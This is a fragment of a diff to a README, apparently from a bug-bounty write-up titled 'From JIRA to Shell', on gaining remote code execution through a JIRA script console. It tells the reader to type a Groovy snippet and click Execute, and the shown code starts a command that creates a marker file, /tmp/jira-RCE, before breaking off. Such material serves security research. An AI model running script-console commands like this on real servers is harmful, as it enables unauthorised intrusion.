syriusbughunt/From_JIRA_to_Shell/README.md

 <img src="https://raw.githubusercontent.com/syriusbughunt/From_JIRA_to_Shell/master/img/screen2.jpg" width="1000"/>

 Are you ready for RCE?
-In the console box, type:
+In the console box, type the following and click on Execute button after:
 ```
 def command = '''
     touch /tmp/jira-RCE